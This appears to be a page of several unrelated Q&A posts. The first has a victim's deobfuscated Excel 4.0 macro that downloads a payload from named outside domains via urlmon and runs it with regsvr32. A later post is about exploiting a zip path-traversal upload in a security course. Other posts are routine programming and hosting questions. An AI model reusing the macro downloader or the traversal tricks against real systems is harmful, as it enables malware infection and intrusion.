To cut a long story short, I got duped: I opened a malicious Excel file and ran the macro.
After digging through the guts of the Excel file, the payload was highly obfuscated but I managed to piece it together:
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
Note: actual full URLs above redacted to avoid accidental exposure by anyone reading this.
When accessed, the malicious URLs contain the following contents:
onlinebrandedcontent: Standard Apache file index page with no contents
onlyfansgo: Boilerplate hosting provider "Account Suspended" page with no inclusions or Javascript.
marcoantonioguerrerafitness / acceptanceh / gloselweb: Triggers download of a (presumably malicious) DLL file
It appears the code above only got as far as the onlyfansgo URL (enu.ocx on my machine contains the harmless HTML "Account Suspended" markup with a reference to webmaster#onlyfansgo.com), so it looks like I dodged a bullet (regsvr32.exe would have attempted to register a HTML file and failed).
My question: Why did the payload pull the onlyfansgo URL response but stop there? If it was willing to accept a HTML file as a successful download, why did it not stop at onlinebrandedcontent? Is it something to do with the fact that onlyfansgo is the only HTTPS URL in the list?
Related
Is it possible to download a file nested in a zip file, without downloading the entire zip archive?
For example from a url that could look like:
https://www.any.com/zipfile.zip?dir1\dir2\ZippedFileName.txt
Depending on if you are asking whether there is a simple way of implementing this on the server-side or a way of using standard protocols so you can do it from the client-side, there are different answers:
Doing it with the server's intentional support
Optimally, you implement a handler on the server that accepts a query string to any file download similar to your suggestion (I would however include a variable name, example: ?download_partial=dir1/dir2/file
). Then the server can just extract the file from the ZIP archive and serve just that (maybe via a compressed stream if the file is large).
If this is the path you are going and you update the question with the technology used on the server, someone may be able to answer with suggested code.
But on with the slightly more fun way...
Doing it opportunistically if the server cooperates a little
There are two things that conspire to make this a bit feasible, but only worth it if the ZIP file is massive in comparison to the file you want from it.
ZIP files have a directory that says where in the archive each file is. This directory is present at the end of the archive.
HTTP servers optionally allow download of only a range of a response.
So, if we issue a HEAD request for the URL of the ZIP file: HEAD /path/file.zip we may get back a header Accept-Ranges: bytes and a header Content-Length that tells us the length of the ZIP file. If we have those then we can issue a GET request with the header (for example) Range: bytes=1000000-1024000 which would give us part of the file.
The directory of files is towards the end of the archive, so if we request a reasonable block from the end of the file then we will likely get the central directory included. We then look up the file we want, and know where it is located in the large ZIP file.
We can then request just that range from the server, and decompress the result...
I have a JSON file I use to store dialogue for a game. However, the changes I make to this JSON file are sometimes not reflected in my game even after hard reloads (I've been doing ctrl+shift+r or shift+F5 for this). I have made sure the changes to the JSON file are saved.
I have this.load.json('dialogue', 'assets/dialogue.json'); in preload(), and this.dialogue = this.cache.json.get('dialogue'); in create().
When I try copy+pasting the contents to a new different file (e.g. dialogue-2.json), and update my this.load.json() to reflect the new file name, the changes do get loaded.
The problem is that phaser doesn't automatic start the loading files, except in the preload function.
If you want to load files in other functions you need to call the start method of the LoadPlugin. Here the link to the official documentation.
The code should look something like this:
function create(){
// some code here ...
this.load.json(/* key and file...*/);
// start the loading of the enqueued files
this.load.start();
// some code here...
}
..., than the files should get loaded.
Update (copied form comments):
to check (and as a tempoary quickfix) if your problem, is a caching issue from the Webserver or browser or ..., you can load the file with a "dynamic" Url.
Just a load the file with a questionmark and random number added to the url, so that each call to the json uses aunique Url.
For Example like this:
this.load.json('dialogue', 'assets/dialogue.json?' + Math.random());
If this solves the problem, there is a caching problem. It could be in the browser, or simply caused by serviceworker or on the webserver.
I just downloaded this report called Analyzing and Visualizing Data with F# and am having a hard time just running the first example. This should probably be expected since the report is 7 years. I am running the first script which is as follows.
#load "packages/FsLab/FsLab.fsx"
open FSharp.Data
open XPlot.GoogleCharts
let wb = WorldBankData.GetDataContext()
wb.Countries
I get an error message that reads
Response from http://api.worldbank.org/country?per_page=1000&format=json&page=1:
{ "statusCode": 404, "message": "Resource not found" }
It looks like the url is broken because it seems that the worldbank has updated its api. When I use the url http://api.worldbank.org/v2/country in my browser it works. I noticed when I went to the source code that they have the base url hard coded in, so I was thinking I would just need to add "v2/" to it and it would work, but I am unfamiliar with how to load a edited library into my script.
Yes, your investigation is correct, even banks sometimes change their APIs :)
As for adding the library to your script, it depends on how your environment looks like, but basically you can fix the problem locally and/or globally.
For the local solution, once you compile your downloaded library with modified url, you can load or reference it as described here.
For the global solution, send a pull request that fixes the link in this file, Tomáš Petřiček (the repo owner) is generally active and should merge it. And you will improve the world a little bit.
I have a Java Web App running on Tomcat on which I'm supposed to exploit Path traversal vulnerability. There is a section (in the App) at which I can upload a .zip file, which gets extracted in the server's /tmp directory. The content of the .zip file is not being checked, so basically I could put anything in it. I tried putting a .jsp file in it and it extracts perfectly. My problem is that I don't know how to reach this file as a "normal" user from browser. I tried entering ../../../tmp/somepage.jsp in the address bar, but Tomcat just strips the ../ and gives me http://localhost:8080/tmp/ resource not available.
Ideal would be if I could somehow encode ../ in the path of somepage.jsp so that it gets extracted in the web riot directory of the Web App. Is this possible? Are there maybe any escape sequences that would translate to ../ after extracting?
Any ideas would be highly appreciated.
Note: This is a school project in a Security course where I'm supposed to locate vulnerabilities and correct them. Not trying to harm anyone...
Sorry about the downvotes. Security is very important, and should be taught.
Do you pass in the file name to be used?
The check that the server does is probably something something like If location starts with "/tmp" then allow it. So what you want to do is pass `/tmp/../home/webapp/"?
Another idea would be to see if you could craft a zip file that would result in the contents being moved up - like if you set "../" in the filename inside the zip, what would happen? You might need to manually modify things if your zip tools don't allow it.
To protect against this kind of vulnerability you are looking for something like this:
String somedirectory = "c:/fixed_directory/";
String file = request.getParameter("file");
if(file.indexOf(".")>-1)
{
//if it contains a ., disallow
out.print("stop trying to hack");
return;
}
else
{
//load specified file and print to screen
loadfile(somedirectory+file+".txt");
///.....
}
If you just were to pass the variable "file" to your loadfile function without checking, then someone could make a link to load any file they want. See https://www.owasp.org/index.php/Path_Traversal
Directory contains about a dozen html files. Index.html contains links to all the others.
Same directory contains hundreds of Word files. HTML files contain links to the Word files.
All links are relative, i.e., no protocol, no host, no path, and no slash.
Click on a link to an HTML file, it works. Click on a link to a word doc, browser says it can't be found. To get more precise on the error, I used wget
Oversimplified version:
wget "http://Lang-Learn.us/RTR/Immigration.html"
gives me the file I asked for, but
wget "http://Lang-Learn.us/RTR/Al otro lado.doc"
tells me that Lang-Learn.us doesn't exist (400)
Same results if I use "lang-learn.us" instead. I did verify correct casing on the filenames themselves, and also tried escaping the spaces with %20 (didn't help, not that I expected it to after the host name message).
The actual session:
MBP:~ wgroleau$ wget "http://Lang-Learn.us/RTR/Immigration.html"
--2011-03-09 00:39:51-- http://lang-learn.us/RTR/Immigration.html
Resolving lang-learn.us... 208.109.14.87
Connecting to lang-learn.us|208.109.14.87|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `Immigration.html.2'
[ <=>
] 5,973 --.-K/s in 0s
2011-03-09 00:39:51 (190 MB/s) - `Immigration.html.2' saved [5973]
MBP:~ wgroleau$ wget "http://Lang-Learn.us/RTR/Al otro lado.doc"
--2011-03-09 00:40:11-- http://lang-learn.us/RTR/Al%20otro%20lado.doc
Resolving lang-learn.us... 208.109.14.87
Connecting to lang-learn.us|208.109.14.87|:80... connected.
HTTP request sent, awaiting response... 400 No Host matches server name lang-learn.us
2011-03-09 00:40:11 ERROR 400: No Host matches server name lang-learn.us.
The error looks like an issue with redirection or domain mapping,
but how could that be turned on or off by the file extension?
The hosting provider at first tried to tell me I don't know how to write HTML, but when I mentioned I've been in software for thirty years and web work for several, he put me on hold to find someone that actually knows something. Eventually they came back and said it's MY fault for not having the correct stuff in .htaccess
Setting aside the obvious retort about it being the hosting provider's job to put the correct stuff in httpd.conf, I made a couple of attempts. But 99% of my web work has been content in HTML/PHP/perl and I know nearly nothing about .htaccess
The following two attempts did NOT work:
AddType application/msword .doc
AddType application/octet-stream .doc
UPDATE: By using
<FilesMatch "\.html$">
ForceType application/octet-stream
</FilesMatch>
I verified that the server does allow .htaccess, but using .doc instead of HTML still gets that idiotic "ERROR 400: No Host matches server name lang-learn.us"
Finally, after hours with more than one "tech supporter," I got them to admit that they had made a configuration error. Besides telling me to use .htaccess, they had an earlier suggestion that I ask the client to convert his hundreds of Word files into HTML pages.
Since the provider is the one that screwed up, there technically is no answer to the question of what can I do to fix it.